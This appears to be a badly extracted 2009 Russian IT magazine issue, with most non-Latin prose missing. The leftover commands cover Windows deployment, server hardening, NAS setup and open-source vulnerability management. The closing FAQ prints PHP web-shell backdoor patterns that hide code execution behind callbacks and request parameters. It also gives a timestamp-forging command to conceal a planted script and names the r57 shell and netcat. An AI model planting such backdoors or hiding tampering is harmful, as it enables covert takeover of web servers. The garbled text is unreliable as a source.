X 10 /130/ 09

DEPLOYMENT WORKBENCH
,
. Summary
, Operating Systems
.

PowerShell:
New-PSDrive -Name "DS001" -PSProvider
MDTProvider -Root "f:\DeploymentShare$"
import-mdtoperatingsystem -path DS001:\
Operating Systems -SourcePath "J:\"
-DestinationFolder "Windows 7 x64" -Verbose

, ,
- .. Packages.
:
Import OS packages ( F:\MCU), CAB MCU.
( )
. PowerShell:
New-PSDrive -Name "DS001" -PSProvider
MDTProvider -Root "f:\DeploymentShare$"
import-mdtpackage -path "DS001:\Packages"
-SourcePath "F:\MCU" -Verbose


Packages, , .
, .
Hide this package in Deployment Wizard
Enable ,

.
, ,
.
.
Out-of-Box Drivers, Import Drives
INF- CAB- (
). Import drives even if they
are duplicates of an existing driver
. Finish
, . , , (x86,
x64) .
PowerShell:
New-PSDrive -Name "DS001" -PSProvider
MDTProvider -Root "f:\DeploymentShare$"
import-mdtdriver -path "DS001:\Out-ofBox Drivers" -SourcePath "G:\drivers"
-ImportDuplicates -Verbose


.
, .
Applications New Applications. . Applications with source files,
.
. Details ,
Application Name,
,

MDT Wizard Editor

HTTP://WWW
links

TechNet,
MDT:
blogs.technet.com/
msdeployment.
technet.microsoft.
com/en-us/
desktopdeployment.

DVD
dvd


PowerShell MDT Wizard
Editor.

,
Microsoft
Deployment Toolkit
2010,

,
.

MDT 2010 , .
. , , XML- DeploymentShare$\Scripts\DeployWiz_Definition_ENU.xml. .
MDT Wizard Editor (mdtwizardeditor.codeplex.com/Wiki/View.aspx) , .NET
Framework 2.0 Microsoft Public License (Ms-PL). : XML-,
( Preview). .
X 10 /130/ 09

113

SYN\ACK
SYN\ACK

MDT
Optional.
.
,
.
, Firefox :
FirefoxSetup.exe /D=<
>

, , INI-:
FirefoxSetup.exe /INI=F:\source\
firefox\setup.ini

setup.ini :
setup.ini
[Install]
InstallDirectoryName=Mozilla
Firefox
QuickLaunchShortcut=true
DesktopShortcut=true
StartMenuShortcuts=true

Finish.
, MS Office.
, , ,
( ), Dependencies
:
New-PSDrive -Name "DS001"
-PSProvider MDTProvider -Root "f:\
DeploymentShare$"
import-MDTApplication -path
"DS001:\Applications -enable
"True" -Name "Mozilla Firefox 3.5.3"
-ShortName Firefox -Version
"3.5.3" -Publisher "Mozilla"
-Language "ru -CommandLine "Firefox
Setup 3.5.3.exe /D=C:\Program Files\
Mozilla Firefox" -WorkingDirectory
".\Applications\Mozilla Firefox

114

MDT WIZARD EDITOR

3.5.3 -ApplicationSourcePath
F:\firefox -DestinationFolder
Mozilla Firefox 3.5.3 -Verbose

UNC (, DFS),
, New Application
Wizard Applications without source
files or elsewhere on the network. ,
,
. Application bundle
.


,
. Task
Sequences
New Task
Sequence.
ID (win7-001)
(Windows 7 Install), (
). Select Template
.
Standard Client Task Sequence,

, Standard Server Task Sequence
. , 5 ,

Sysprep and Capture, Standard
Client Replace Task Sequence, Custom Task
Sequence, Litetouch OEM Task Sequence
Post OS Installation Task Sequence.

, , (,
, ),
.
. ,
:
Unattend.xml ( Windows System Image
Manager), ( , ).

New-PSDrive -Name "DS001"


-PSProvider MDTProvider -Root "f:\
DeploymentShare$"
import-mdttasksequence -path
"DS001:\Task Sequences -Name
"Windows 7 Install" -Template
"Client.xml" -Comments Windows 7
Install" -ID "Win7-001" -Version
"1.0" -OperatingSystemPath
"DS001:\Operating Systems\Windows
7 PROFESSIONAL in Windows 7 x64
install.wim" -FullName "grinder"
-OrgName "Gljuk" -HomePage
"about:blank -AdminPassword "p@
ssw()rd -Verbose


,
.
Deployment Workbench
Update Deployment
Share. .

( )
.
. .
,
DeploymentShare$\Boot WIM/ISO- 32-/64- .
ISO- , , WMI- WDS
( Boot
Images). C PowerShell
:
New-PSDrive -Name "DS001"
-PSProvider MDTProvider -Root "f:\
DeploymentShare$"
update-MDTDeploymentShare -path
"DS001:" -Verbose

, MDT 2010
.z
X 10 /130/ 09

URBAN.PRANKSTER@GMAIL.COM


Microsoft
, Web, SQL, VoIP . . ,
Windows , ,
.
. , Microsoft: Exchange Server, IIS Hyper-V.
EXCHANGE SERVER

.
, ,
Exchange Server

,
, Active Directory
. 2-3 (
Sendmail). .
Exchange Server 2007
z 2007 ,
,
.
, .
. SP1
Win2k3 (Security Configuration Wizard, SCW).
, ,


, .
,
, .
X 10 /130/ 09

SCW ,

Windows.

( ).
SCW
Viewer ( SCW
) ,
,
Exchange
2003, 2007 .
. Microsoft Exchange
- SCW.
Scripts Exchange2007.xml
Exchange2007Edge.xml ( Win2k8 Exchange2007_
Winsrv2008.xml Exchange2007Edge_
Winsrv2008.xml),
,
SCW . Exchange2007.
xml
Exchange, Edge Transport.
, Edge Transport
Exchange. ,
, DMZ
. -

, .
,
Active Directory. Edge Transport
, Edge.
SCW- ,
%SystemRoot%\
security\msscw\kbs,
SCWCMD.EXE ( SCW.EXE),
:
> SCWCMD Register /
kbname:Exchange2007 /kbfile:C:\
Windows\security\msscw\kbs\
Exchange2007.xml
> SCWCMD Register /
kbname:Exchange2007Edge /kbfile:C:\
Windows\security\msscw\kbs\
Exchange2007Edge.xml

, kbs
Exchange2007loc.xml
Exchange2007Edgeloc.xml, .
, SCWCMD , XML-.
:

115

SYN\ACK

> SCWCMD View /x:C:\Windows\security\msscw\kbs\


Exchange2007Edge.xml

SCW Viewer , .
,

.
:
> SCW /kb \\server\scwkb

, , , .
,
.
,
, ,
, ,
. , ,
,
.
, ,
, .
,
.
,
DNS, NetBIOS IP-.


. -

116

, Exchange 2007; ,
XML-, , .
,
, .
. ,
, . ,
,
- .
. , . (DHCP, DNS- . .) ,
( Windows,
, ..)
, .
,
.
, ,
, SCW .
, .
. ,
,
,
. . .
, . ,
. ,
. .
, , ,
.
X 10 /130/ 09

XML-
EXCHANGE 2007

SCW VIEWER
; ,
IP-
. , ,
, Exchange (
IIS). .
,
,
.

SMB. , ,

.
( CPU). ,
,
.
LDAP, ,
(
Win2kSP3 ). LAN Manager .
, .
(
Win95-Me) (.
AD z 2009 ).
.
.
Win2kSP6 ,
NTP-.
.
, .
: ,
, . , ,
X 10 /130/ 09

/
SCWAudit.inf,
ACL
(:
SCW).
. ,
IIS (
,
). .
,
. , .

, .

.
SCW.

IIS - IIS (Internet


Information Services) ,
,

Windows. , ,
- , ( ,
), . Win2k8 IIS 7.0 (IIS 7.5 Win2k8R2),
, . ,
IIS ,
Win2k8. ,
, .
, 9 40
Role Services,
HTTP,
, -

,
IIS (IIS Manager). Role
Services 8 .

IIS 6.0 Management Compatibility
( IIS 6),
API -. ,
Exchange Server 2007
. FastCGI
Perl, PHP,
Ruby web-, .
IIS ,

.
.

IIS,
( Inetmgr).
IP-, ,

, .
,
IPv4-


. ,
10.0.0.1, :
> appcmd set config /
section:ipsecurity /+"[ipaddress='1
0.0.0.1',allowed='false']"

, ,
false true.

,
(80 443).
-

117

SYN\ACK

INFO

info

Hyper-V
,

z 2009 .


SCWCMD
SCWCMD
transform.

HTTP://WWW
links
HyperV Security Guide:
go.microsoft.com/
fwlink/?LinkID=
147397.

/MNT/SHARE /MNT/PRIVATE
,
(
180) .

IIS HTTP-,
. ,
Appcmd.exe WMI. :


AzMan
TechNet: technet.
microsoft.com/
en-us/library/
cc786774(WS.10).
aspx.


Appcmd.exe
technet.microsoft.
com/ru-ru/library/
cc772200(WS.10).
aspx.

> appcmd list config -section:requestFiltering

> appcmd set config /section:requestfiltering


/fileExtensions.allowunlisted:false

,
.
.
,
, ( IUSR), (
).
:
> appcmd set config /
section:anonymousAuthentication /userName:
string /password: string

: Active Directory, -.
,
.

118

,
:

exe,
:
> appcmd set config /section:system.webServer/
security/requestFiltering -fileExtensions.
[fileExtension='.exe'].allowed:false


, URL HTTP-, URL .

HYPER-V
,
, , .
,
. ,
X 10 /130/ 09



, ,
,
. Hyper-V
, ,
, .

,
. Hyper-V
, ,

.
, .
Hyper-V :
, ,
. .

:
> wmic qfe list


KB950050,
Hyper-V,
Language Pack for Hyper-V
(KB951636). , Vista (KB952627),

Win2k8 Hyper-V.
.
Hyper-V
, ..
.
(IDS),

. ,
, vmms.exe vmwp.exe
( %SystemRoot%\System32). ,

X 10 /130/ 09

. (Local Security Policy)


(User Rights Assignment).

, ,

. , , , 2
: (
),

. ,
Hyper-V Server Core.
,
.
Hyper-V
.
, . (Authorization
Manager),
. ,
( ),
, , (,
). ,
AzMan.msc;
, ,
.
Active Directory ADAM (Active
Directory Application Mode), Microsoft
SQL XML. Windows
InitialStore.xml,
C:\Program Data\Microsoft\
Windows\Hyper-V.
Hyper-V,

.

(Open Authorization

Store), .
Microsoft Hyper-V services Role Assignments
Administrator, Action
Assign Users and Groups From Windows
and Active Directory.
,
Hyper-V.
,
.

..
,
, AzMan
Active Directory.
MMC- AzMan
TechNet: technet.microsoft.com/en-us/library/
cc786774(WS.10).aspx.

VHD (Virtual Hard Disk)
%users%\Public\Documents\Hyper-V\Virtual
Hard Disks.
Hyper-V Manager,

.
, ,
BitLocker
(Encrypting File System
Hyper-V). ,
CPU, RAM HDD ,
. ,
,
VM.

, .
,
, .
,
,
, , . z

119

SYN\ACK
SYN\ACK
J1M@SYNACK.RU

NAS !
NAS
NAS ,
.
, NAS ?
NAS
Network Attached Storage (, C).
( VIA),
IDE/SATA-.

(CIFS, NFS, FTP/FTPS, HTTP/HTTPS
..) -
,
Linux.
Linux , ,


.
NAS ,
Linux ,
-
.
NAS-
,

Linux-.

NAS-? -,
,
,

.
, , X Window,
/dev/null.
, ,

(glibc, ncurses
..). -,
: samba
( CIFS), nfs-kernel-server ( NFS), vsftpd (FTP/FTPS), lighttpd
(HTTP/HTTPS), ssh (SFTP) rsync (
). -,
USB-
LiveCD ( ,

).
, Active
Directory LDAP, /etc/passwd
.

,
NAS-
,

FLASH-
Linux USB-flash .
-

120

, , , ,
.
USB- HDD
.


qemu:
$ qemu -cdrom ///linux.iso -hda
/dev/sd* -boot d

,

( ).

ext2, flash- (
+
).

flash- (
qemu)
:
X Window, ,
..
samba, nfs-kernel-server, nfs-common,
portmap, vsftpd, rsync, lighttpd, opensshserver ( Ubuntu 9.04).
X 10 /130/ 09


, .
/mnt: share ( , ) private ( ). ,
RAID /mnt (
/etc/fstab) ,
. , ,
/mnt/share /mnt/private ,
,
. :
# chmod 1777 /mnt/share
# chown root:users /mnt/private
# chmod 770 /mnt/private

, :
1) /mnt/share
, ,
( ,
/tmp);
2) /mnt/private root
users,
.
,
(, director, buhgalter, admin
..) /mnt/private.
:
* director /mnt/private/director,
director:users, 700
X 10 /130/ 09

* buhgalter /mnt/private/buhgalter,
buhgalter:users, 700
* admin /mnt/private/admin,
admin:users, 700

CIFS NAS-
Windows,
CIFS . smb.conf,
: /mnt/share
(/mnt/private/),
.
Samba:
$ sudo apt-get install samba

/etc/samba/smb.conf :
$ sudo vim /etc/samba/smb.conf
[global]
;
workgroup = WORKGROUP
;
server string = Corporate NAS-server
;
dns proxy = no
; -
log file = /var/log/samba/log.%m
max log size = 1000
; syslog
syslog = 0
;

121

SYN\ACK

/MNT/SHARE

LIGHTTPD.CONF

security = user
;
encrypt passwords = true
; ,

passdb backend = tdbsam


; smb /etc/passwd
unix password sync = yes
passwd program = /usr/bin/passwd %u
passwd chat = *Enter\snew\s*\
spassword:* %n\n *Retype\snew\s*\
spassword:* %n\n *password\
supdated\ssuccessfully* .

NFS IT-

. ,

NFS-:

; ,
[share]
comment = Global Share
path = /mnt/share
valid users = @users
force group = users
create mask = 0666
directory mask = 0777
writable = yes

192.168.1.1/24 , .
/
mnt/share, /mnt/private,

.
:

;
[homes]
comment = Private Directories
browseable = no
valid users = %S
writable = yes
create mask = 0600
directory mask = 0700

FTP
NAS FTP. FTP

, Windows
cp1251,
UNIX koi8-r utf-8.
vsftpd

.

, vsftpd,
vsftpd.devnet.ru,

cp1251.
Windows-.

,
,
:
$ sudo smbpasswd -a
<>

:
$ sudo service samba start

122

$ sudo apt-get install nfs-kernelserver nfs-common portmap

/etc/exports
:
/mnt 192.168.1.1/24 (rw,no_root_
squash,async,subtree_check)

IP ,
utf-8.
, vsftpd-2.1.2-ext1.tgz, , :
$ wget http://vsftpd.devnet.ru/
files/2.1.2/ext.1/vsftpd-2.1.2ext1.tgz
$ tar -xzf vsftpd-2.1.2-ext1.tgz
$ cd vsftpd-2.1.2-ext.1
$ sudo apt-get install buildessential
$ make
$ sudo make install

nobody (
) ftp (
):
$ sudo useradd nobody
$ sudo useradd -d /mnt ftp

$ sudo service nfs-kernel-server start

/usr/share/empty, chroot:
$ sudo mkdir /usr/share/empty

/usr/local/sbin/vsftpd
/etc/rc.local ( exit 0).
/etc/vsftpd.conf
:
$ sudo vim /etc/vsftpd.conf
#
anonymous_enable=YES
# inetd
listen=YES
# ( ,
,
/mnt/
private).
X 10 /130/ 09

/MNT/SHARE /MNT/PRIVATE
WARNING
local_enable=YES
# (/mnt/private/)
chroot_local_user=YES
#
write_enable=YES
# ,
local_umask=077
# ,

anon_umask=000
#
anon_upload_enable=YES
#

anon_mkdir_write_enable=YES
# /

xferlog_enable=YES
xferlog_file=/var/log/vsftpd.log
xferlog_std_format=YES
# 20-
connect_from_port_20=YES
#
convert_charset_enable=1
# utf-8
local_charset=UTF8
# cp1251
remote_charset=WIN1251

/etc/vsftpd/pasv_rules IP- ,
cp1251, :
IP- IP-/ IP- yes yes yes yes no

:
192.168.1.1 192.168.1.23/32 192.168.1.1 UTF8
yes yes yes yes no
X 10 /130/ 09

:
$ sudo /usr/local/sbin/vsftpd

anonymous ftp
/mnt/share,
.
, /mnt/private
, .
cp1251,
, IP-, /etc/
vsftpd/pasv_rules, (, utf-8).

HTTP HTTP,
.
web- lighttpd,
/mnt/share
( /mnt
web-
/mnt/private).
web-:
$ sudo apt-get install lighttpd

/etc/lighttpd/
lighttpd.conf, :
$ sudo vim /etc/lighttpd/lighttpd.conf
# access accesslog
server.modules = (
"mod_access",
"mod_accesslog"
)
# web- (
)
server.document-root = "/mnt/share"
#
server.errorlog = "/var/log/lighttpd/error.

info


, ,
FAT16.

FAT16

.
lightyenable-mod


Debian/Ubuntu
.



server.modules

lighttpd.conf
(
mod_).
Ubuntu xinetd
inetd
( , /
etc/inetd.conf). ,
,

,
xinetd
'-inetd_compat'.

123

SYN\ACK

SMB.CONF

log"
accesslog.filename = "/var/log/
lighttpd/access.log"
#

server.pid-file = "/var/run/
lighttpd.pid"
# ,
server.username = "www-data"
server.groupname = "www-data"
# (MIME- )
include_shell "/usr/share/lighttpd/
create-mime.assign.pl"
include_shell "/usr/share/lighttpd/
include-conf-enabled.pl"

userdir, :
$ sudo lighty-enable-mod userdir

/etc/lighttpd/lighttpd.
conf :
## virtual directory listings
dir-listing.encoding
= "utf-8"
server.dir-listing
= "enable"

:
$ sudo service lighttpd start

SFTP RSYNC ,
,
NAS SFTP .
openssh-server rsync:
$ sudo apt-get install opensshserver
$ sudo apt-get install rsync

124

VSFTPD

SFTP-,
.
rsync,
.
Rsync ,
. ,
ssh- root
NAS- , -.
,
/
mnt (
):
$ rsync -rc -t -e ssh --rsync-path=/
usr/bin/rsync --temp-dir=/tmp root@
host.org:/mnt /backup/nas


/mnt/private, ,

,
cron ( ).

/mnt/share,
NAS-
TCP-Wrappers.
xinetd tcpd:
$ sudo apt-get install xinetd tcpd

IP- /
etc/hosts.deny:
ALL: 192.168.1.12 192.168.1.15

NAS-
NFS SFTP. vsftpd -

tcpd,
tcp_wrappers=YES :
$ sudo killall vsftpd
$ /usr/local/sbin/vsftpd

Samba tcpd,

xinetd. samba-:
$ sudo service samba stop

/etc/inetd.
conf:
netbios-ssn stream tcp nowait root /
usr/sbin/tcpd /usr/sbin/smbd

xinetd:
$ sudo service xinetd restart

HTTP
,
.


NAS-
. ,
NAS web-,
( SFTP) .
?
SSH
web, ,
,
(
, NAS , ,

, ).z
X 10 /130/ 09

SYN\ACK
NATHAN BINKERT NAT@SYNACK.RU



Navigator DX000ISR1 G2:
1U- Desten


Navigator DX000ISR1 G2

> RAID:
RAID-
0, 1 10

> :
ServerEngines LLC Pilot II
Controller ( IPMI 2.0)
Intel System Management Software 3.1

Intel Remote Management Module (RMM3)

:
2 Ethernet 1 /

> :
2 (9794x33 )

:
400

> :
(1U, 431x765x43 )

> :
6 SATA2

> :
1 PCI-Express Gen2 x8 ()

> :
3

,
Depo Computers iRU,
Desten 1U-
Navigator DX000ISR1 G2.
DX000ISR1 G2
, Intel 5500
Intel Xeon .
: Web-,
, , ,
.

,
64
DDR3 ( 32 ),
3.5" SATA2,
Slimline SATA bay.
RAID- RAID-

0, 1 10.
PCI-Express
x8 GigabitEthernet-.
Intel 5500
Intel Xeon, , :
Intel Turbo Boost,

;
Intelligent Power,
;
,

64 /, ;

.

IPMI 2.0 ,
LLC Pilot II Controller. Remote Management
Module (RMM3, ), KVM over LAN /
. Intel System Management Software,
, ,
.
.
.
43798 , www.desten.ru

> :
1 2 Intel Xeon 55xx
> :
Intel 5500

>> SYN/ACK

> :
1 64 DDR3 1066/1333
8

126

2 SATA 3.5"
1 Slimline SATA bay

X 10 /130/ 09

Smart-UPS 1000i USB Smart-UPS 1500 RM 2U USB:


APC


Smart-UPS 1000i USB (SUA1000I)
> :
670 / 1000

4 IEC 320 C13


> :
RBC24, -
, 3-6

> :
151 302
> :
2
8 IEC 320 C13
> :
RBC6, -
, 3-6
> :
3
> :
20.6 (335
)
6.1 (670 )

>> SYN/ACK

> :
DB-9 RS-232
SmartSlot
USB

, APC
- .

Smart-UPS APC, ,
. ,

IN DA FOCUS .
: Smart-UPS 1000i USB Smart-UPS
1500 RM 2U USB
APC,
.
670
SUA1000I 980
SUA1500RMI2U. 8 4 ; ,
-
3-6 . X 10 /130/ 09

> :
3
> :
41
> :
216x170x439
> :
13.2


Smart-UPS 1500 RM 2U USB
(SUA1500RMI2U)

> :
26.5 (490
)
7.4 (980 )
> :
DB-9 RS-232
SmartSlot
USB

:
980 / 1500

> :
46

> :
151 302

> :
89x432x457
19" , 2U

> :
2

> :
28,6

3 ,
6.1
SUA1000I 7.4 SUA1500RMI2U.
,
.
, .
. 151-302 .
USB-
PowerChute,
.
PowerChute , , ,

, .
SmartSlot -

,
(,
, , ).

: , ,
,
..
.
C-tick, CE, EN 50091-1, EN
50091-2,GOST, VDE
RoHS 7b Exemption. 2 .
Smart-UPS 1000i USB: 11600
Smart-UPS 1500 RM 2U USB: 20960

127

SYN\ACK
SYN\ACK
GRINDER GRINDER@SYNACK.RU


IT-
Open Source
, , .
.
.
,
(Vulnerability Management).
?
, -,
: ,
, Snort
BASE,
Nessus/OpenVAS,
Nmap .
/
, .


.
, .. ,
,
.
:
, ,
, ,
.
,
,
-

128

. , , Security
Focus (www.securityfocus.com/vulnerabilities)
OSVDB (Open Source Vulnerability
DataBase, osvdb.org),
2002 .
HackerStorm
OSVDB Tool (www.hackerstorm.com).

,
, (nvd.nist.gov).

,
,

. , IT
, .
,

. ,
,
, ..
Microsoft Security Response
Center (MSRC), IBM Internet Security Systems,
Lumension Vulnerability Management (

PatchLink), QualysGuard, Symantec Control


Compliance Suite (SCCS), MaxPatrol Positive
Technologies .
,
.
.

OSSIM
OSSIM (Open Source Security
Information Management, ossim.net)
.
,
.

,

. OSSIM
: Arpwatch, P0f, pads, Nessus/OpenVAS,
Ntop, Snort, tcptrack, tcpdump, Nmap, Spade,
Nagios, Osiris, OCSInventory-NG, OSSEC,
RRDTool (
, preludeIDS, NTsyslog,
Snare, Cisco Secure IDS).
:
syslog, plain log, SNMP, OPSEC, .

, .

X 10 /130/ 09

, (, ),
(, , http, ftp ..)

. OCSInventory-NG .
OSSIM
.
-, UDP, TCP ICMP , ,
. OSSIM (IPS, Intrusion Prevention System),
, .
!
OSSIM :
, , ;
framework, ;

( MySQL,
OSSIM, Snort/ACID Phpgacl);

, : Snort, Pads, Ntop,
Tcptrack, p0f, Arpwatch, Nessus . ( www.alienvault.com/home.php?id=plugins);
- ,
, (Apache, PHP c ADOdb, Phpgacl, Rrdtool,
Mrtg, ACID, Nessus, Nmap, Ntop, FPDF .)
,
( SSL).

, (CSO, Chief
Security Officer).
X 10 /130/ 09

OSSIM ,
; Linux.
OSSIM (
CVS) ISO- AlienVault Open Source SIM
Installer (32- 64- ~600 ).
, OSSIM ; .
.
OSSIM
Debian, Gentoo Fedora. ,
, . ,
,
, , .
, ,
OSSIM.
OSSIM ,
(
).
10 .
SIM Installer Debian 5.0.1 Lenny. , .
( ),
, (Install,
Graphical Install, Advanced Options Help), .
Debian ,
, ; ,
, (IP-, , DNS-, ).

, . ,
, . , , ,
Debian,
.

129

SYN\ACK
SYN\ACK

ALIENVAULT OSSIM
INSTALLER OSSIM
OSSIM-SETUP
-

,
OSSIM.

OSSIM netstat
-ant ,
. , OSSIM
.
OSSIM /etc/ossim;
server,
framework, agent update.
ossim_setup.conf,
, ossim-setup.
MySQL,
.
,
. , detectors , (
, ). OSSIM
, , :

HTTP://WWW
links
:
OSSIM ossim.net.
SIGVI sigvi.upcnet.
es, sigvi.sf.net.

# vi /etc/ossim/ossim_setup.conf
[sensor]
detectors=snare, p0f, osiris, arpwatch,
snortunified, pads, ssh, pam_unix, rrd, sudo,
iptables, nagios
interfaces=eth0
monitors=nmap-monitor, ntop-monitor, ossimmonitor

RogueScanner
www.paglo.
com/opensource/
roguescanner.

, :

Advisory Check
advchk.unixgu.ru.

SIGVI
sigvi.upcnet.es/
demo_sigvi.

, ,
agent/config.cfg. OSSIM
40001; , port:

130

interfaces=eth0,eth1

# vi /etc/ossim/agent/config.cfg
[output-server]
enable = True
ip = 192.168.17.10
port = 40001

-
http://server; admin/admin.
, .
.
. OSSIM: Dashboards ( ,
), Incidents,
Events (, ), Monitors (
), Reports ( , , ,
), Policy ( , e-mail), Correlation, Configuration,
Tools (, , ).
. , OSSIM.
Policy Policy.
Network Tools NetScan,
Enable full scan
.
, Policy
Policy Host.
.
. , Tools
Downloads,
, .
,
Help; .
.

SIGVI: SIGVI (sigvi.upcnet.


es)
Open Source
( GNU GPL), ,
.
SIGVI :
(
CVE, CPE CVSS SCAP, . ),
. ,
,
Tools Sources. ,
SIGVI .
NSDi
(Network Services Discoverer),
X 10 /130/ 09

OSSIM

. , ,
SIGVI (alert).
.
CVSS.
0 10,
(, Nessus ).
(, ),
( ,
..), , ,
, . CVSS
Security Lab (www.securitylab.ru/analytics/355336.
php). ,
, . ,
,
.

.
.
SIGVI PHP5, LAMP (Linux+Apache+MySQL+PHP5)
.
MySQL, PostgreSQL, SQL Server, Oracle, Informix . , ,
.
-
(- wwwdata):
$ sudo tar xzvf sigvi-1.3.02b.tgz - /var/www/
$ sudo chown -R www-data:www-data /var/www/
$ sudo chmod -R 750 /var/www/sigvi

:
$ mysql -u root -p < sigvi-1.3.02b.sql

OCS INVENTORY


conf/app.conf.php:
# vi /var/www/sigvi/conf/app.conf.php
define("HOME","/sigvi"); //
define("ADM_EMAIL","sigvi <root@localhost>");
//
define("SERVER_URL","http://localhost"); //
URL
// mysql, mysqli, postgres, oracle,
include/dbms
define("DBType","mysqli");
// ,
define("DBServer","localhost");
define("DBName","sigvi");
// ( )
define("DBUser","sigvi");
define("DBPass","NEWpassword");
// , , LDAP
define("authMethod","dbms");
//define("ldapServer","ldaps://your.ldap.
server");

,
:

INFO

info
OSSIM

,
,

, ,
MAC-,

.

OSSIM

AlienVault Open
Source SIM Installer,

Debian
.

mysql> UPDATE user SET Password=PASSWORD


('NEWpassword') WHERE user='sigvi';

, SIGVI
(LDAP,
).

Sguil
Sguil (sguil.sf.net) Vulnerability Management, , . -
. , Snort.
BASE, MySQL .
. Tcl/Tk , Linux, *BSD, Solaris, Mac OS X Windows.
X 10 /130/ 09

131

SYN\ACK
SYN\ACK

SIGVI
SIGVI ( ),
( ,
)
( , ).

? OSSIM SIGVI
, , ,
.
.
Advisory Check (ADVCHK,
advchk.unixgu.ru) SIGVI. ,
RSS, RDF XML-

.

,
( pkg_info, dpkg,
rpm, portage, lpp, Windows ), ,
.
,
. :
SSH,
Windows-RPC Nmap.
ADVCHK Perl'
15 . :
Getopt::Std,

SCAP
(The Security Content Automation
Protocol, scap.nist.gov) , . , . SCAP :
(Common Vulnerabilities and Exposures, CVE);
(Common Configuration Enumeration, CCE);
(Common Platform Enumeration, CPE);
(Common Vulnerability Scoring System,
CVSS);
(Extensible Configuration
Checklist Description Format, XCCDF);
(Open Vulnerability and Assessment Language,
OVAL).

132

,
SIGVI
LWP::UserAgent Storable,
./install.sh. WinNT/2k/XP/2k3
WinExe, eol.
ovh.org/winexe.
advchk_addfeeds.sh, .
RogueScanner (www.paglo.com/
opensource/roguescanner)

WiFi-.
(Collaborative Device Classification
System, 1 .
),
.

,
,
, , IP/MAC-, DNS NetBIOS-.

. RogueScanner
.z
X 10 /130/ 09

UNITS

AMDF00@GMAIL.COM

PSYCHO:

.
,
, .

.

. , -
. ,
, . ,
, .
, ,
,
.
, -
, , ,
. ,
,
. ,

. , , ,

, , ,

. ,
- ?
, ,

134

,
.
.

,
.
,
!

()
, ,

. , .
, , ?
,

, . .
,
! ,
,
.
. ,

, . ,
,

.
,


, ,
, , , ,
.


, , , .
,
,
.
,

.

() () .
(),
,
.


X 10 /130/ 09

.
20-25% ,
.

.
4-5 .

,


. ,
, .
,
.

,

.

, ,
,
.
X 10 /130/ 09

,
.

,
.

,
, .

, ,
.

, , ,
,
.


,
,
- (
).
,
.

.

, ,

.
, ,
, .



,
, ,
, , ,
.
,
,
.
,
-
,
,

.
, .

.

: -

?.

; ,
,
.
, ,
, .
,

,
.
, (
, ,
).
- ,
. , ,
.
,

.
, , , , .


.

135

UNITS

INFO

info
:
forum-worldofdreams.
com/site/forums_
review.html.
,
:
www.dreamlight.ru/
site/books.

:
www.koob.ru/dreams.

, , ,
. ,
.
, .
. , -
, -
,
.
. ,
.

. ,

, ,

, , .
,
.


, ,
. , - , ,
, , , . : . , ,
.
, .
, .
. , .
, .
: ,
. , , .
. ,
. , -
, , ,
. , ,
,
. .
, , .
, .
,
.

136

,

. ,
.
, ,
, , ,
.
.
,
, . .
.
.
.

, . ,
.
,
.
,
.

, , , .

. .
,
.
, .
,


. :
,
X 10 /130/ 09


,

,
.


,
.
,

(
, )
.
,


.
,

.

,

, .

.
,
,


, ,
, ,
, - , , .
, ,
. ,
, .
. ,
, , .
, , ,
- . ,
. -?
? ?
, .
,
, 7-9
. .


, - , .

,
..

,
.
,
, .


.
X 10 /130/ 09

,
.

,
,

, .

,
. , -

,
. ,
,

.
, ,
, ,
.
,

.

.
,
,
.


?
.
,
, . ,
,
,
, : , .
.
,
.

: , ,


, .
, , .
,
. , ,
.

,
- ,

.
,
, .
,
,
. , -
,
. , ,
. , ,

.
,

, .
,
,
.

,
.



, -

137

UNITS

. ,

,

.
,
,
. , ,
.


.
,
. ?
,
.

, ,
, ,
. , , ,
,
- ,
.

,
, . ,
,
. , ,
,
.
-
.

, ,

.

138

,
.
( ),

.

, .

, ,
,

.
,
, ,
,
. ,
.


?
.

, .

, , ,
, . , , ,
, - , .
,
?
, ,
,
,
. ,
. ?

. ,

.
. ,


-, .

,
,
, ,
.
,
, ,


.
, .
,
,

,

. , (
)
(, ).

.
-
, ,

,
,
,

.
- .

, , .
, ,
. ,
,
. z
X 10 /130/ 09


2100 . ( 15%
)

. ,

!
!

+ + DVD:

- 155 ( 25% , )
12

3720

2100

+DVD 6
1200 .
, ,
8(495)780-88-29 ( )
8(800)200-3-999 ( , , ). info@glc.ru
www.GLC.ru

1. ,
, www.
glc.ru.
2. .
3.
:
subscribe@glc.ru;
8 (495) 780-88-24;
119021, ,
. , . 11, . 44,
, .

:

;
20
.
,
.
, . ,
, .

!
C 2009
72 000 QIWI ()
.

UNITS
/ HTTP://WAP-CHAT.RU /

faq
united
@real.xakep.ru

Q: ,
www.myipneighbors.com
. ,
, ?
A: http://spyonweb.com,

.
, : IP-,
Google Adsense, Google Analytics,
Yahoo Publisher Network,
..
IP-,


.
107 , :
9 105 180 Google Analytics, 4
262 150 Google AdSense, 20 406
Yahoo Publisher Network, 13 448
Yandex Direct.

140


.


http://www.robtex.com/dns.
, URL,
dns .
Q:
. ?
A: ,
( SEO ),

/
:

<?php
$a($b); //register_globals = On,
:
script.php?a=assert&b=phpinfo();
#---#
$new = create_function('$x',
"return $_REQUEST[a];");
$new(0); // script.

php?a=eval(phpinfo())
#---#
$a=call_user_func($_
REQUEST[a],'',$_REQUEST[a]);
$b=call_user_func($a);
echo($b); // script.php?a=create_
function&a=return eval($_
REQUEST[b]);&b=phpinfo();
#---#
$a=call_user_func($_REQUEST[a],$_
REQUEST[b]);
echo($a); // script.
php?a=phpinfo&b=-1
#---#
usort ($_REQUEST['a'], $_
REQUEST['b']); // script.php?a[]=1&b=phpinfo
#---#
array_map($_REQUEST[a],$_
REQUEST[b]); //script.php?a=-1&b[]=phpinfo
#---#
assert($_REQUEST['a']); //script.
php?a=phpinfo();
#---#
X 10 /130/ 09

ob_start($_REQUEST['a']);
echo $_REQUEST['b'];
ob_end_flush(); // script.
php?a=phpinfo&b=-1
#---#
?>

, usort, array_map
ob_start
callback-, :
register_shutdown_function
set_error_handler
call_user_func_array
call_user_method
call_user_method_array
uasort
uksort
array_filter
array_reduce
array_walk
preg_replace_callback
stream_filter_register
xml_set_element_handler
xml_set_default_handler
xml_set_notation_decl_handler
xml_set_character_data_handler
xml_set_end_namespace_decl_handler
xml_set_external_entity_ref_
handler
xml_set_start_namespace_decl_
handler
xml_set_unparsed_entity_decl_
handler
xml_set_processing_instruction_
handler
xmlrpc_server_call_method
xmlrpc_server_register_method
xmlrpc_server_register_
introspection_callback

,
:
touch -t yearmonthdayhoursminutes.
seconds ./script.php
Q:
root .
A: , , -

. ,
, :)
, , ,
:
1. r57 rst;
2. windows- netcat
